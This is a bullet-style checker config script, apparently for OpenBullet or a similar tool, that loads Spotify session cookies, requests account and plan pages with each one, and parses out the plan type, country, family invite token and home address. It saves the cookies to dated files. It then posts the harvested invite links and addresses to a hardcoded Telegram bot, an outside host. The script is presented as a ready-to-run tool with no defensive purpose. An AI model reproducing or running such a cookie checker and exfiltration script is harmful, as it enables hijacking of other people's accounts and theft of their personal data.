[SETTINGS]
{
  "Name": "Spotify CookiesByXD_OD",
  "Type": 1,
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-07-07T16:46:31.2957832+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Evokkers",
  "Version": "1.3.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
COOKIECONTAINER "spotify" "<COOKIEPATH>" -> SAVE "X" 

#CHECK REQUEST GET "https://www.spotify.com/eg-ar/account/overview/" 
  
  COOKIE "<X>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY ",\"planType\":\"" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain ",\"planType\":\"" 

#Address PARSE "<SOURCE>" LR ",\"address\":\"" "\"," -> VAR "Address" 

#InviteToken PARSE "<SOURCE>" LR ",\"inviteToken\":\"" "\"," -> VAR "invitetoken" 

#pageSetupMarket PARSE "<SOURCE>" LR "pageSetupMarket\":\"" "\"" -> VAR "pageSetupMarket" 

#Has_Free_Slots PARSE "<SOURCE>" LR "\"planHasFreeSlots\":" ",\"" CreateEmpty=FALSE -> CAP "has_free_slots" 

FUNCTION Constant "Has Free Slots = <has_free_slots>" -> VAR "hsf1" 

REQUEST GET "https://www.spotify.com/in-en/api/account/v1/datalayer/" 
  
  COOKIE "<X>" 
  HEADER ": scheme:https" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Priority: u=1, i" 
  HEADER "Referer: https://www.spotify.com/in-en/account/manage-your-plan/" 
  HEADER "Sec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 

#Country PARSE "<SOURCE>" LR "country\":\"" "\"," CreateEmpty=FALSE -> CAP "Country" 

FUNCTION Constant "Country = <Country> " -> VAR "cuntry" 

#Plan PARSE "<SOURCE>" LR ",\"currentPlan\":\"" "\"," CreateEmpty=FALSE -> CAP "Plan" 

FUNCTION Constant "Plan = <Plan>" -> VAR "pln" 

#Family_Owner_or_Member PARSE "<SOURCE>" LR "isSubAccount\":" "," -> VAR "FOM" 

FUNCTION Constant "Family Member = <FOM>" -> CAP "FOM1" 

REQUEST GET "https://www.spotify.com/in-en/account/manage-your-plan/" 
  
  COOKIE "<X>" 
  HEADER ": scheme:https" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Priority: u=0, i" 
  HEADER "Referer: https://www.spotify.com/in-en/account/overview/?utm_source=spotify&utm_medium=menu&utm_campaign=your_account" 
  HEADER "Sec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 

FUNCTION Constant "Invite link: spotify.com/<pageSetupMarket>/family/join/invite/<invitetoken>/ \\nAddress: <Address> \\nSpotify Invite Config By XD_OD (@Evokkers)" -> VAR "Data" 

#By FUNCTION Constant "XD_OD " -> CAP "By" 

#Utime FUNCTION CurrentUnixTime -> VAR "time" 

#Date FUNCTION UnixTimeToDate "dd-MM-yyyy" "<time>" -> VAR "time2" 

#Save UTILITY File "Cookies\\Spotify\\<time2>\\[<cuntry>] [<pln>] [<FOM1>] [<hsf1>] .txt" WriteLines "<COOKIENETSCAPE>\\n\\n<Data>" 

REQUEST POST "https://api.telegram.org/bot7063079414:AAHMGTQrRmwepBTo_jfiB5UbhhhPQeixQ40/sendmessage?chat_id=5737829871" 
  CONTENT "CONTENT &text= <Data>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

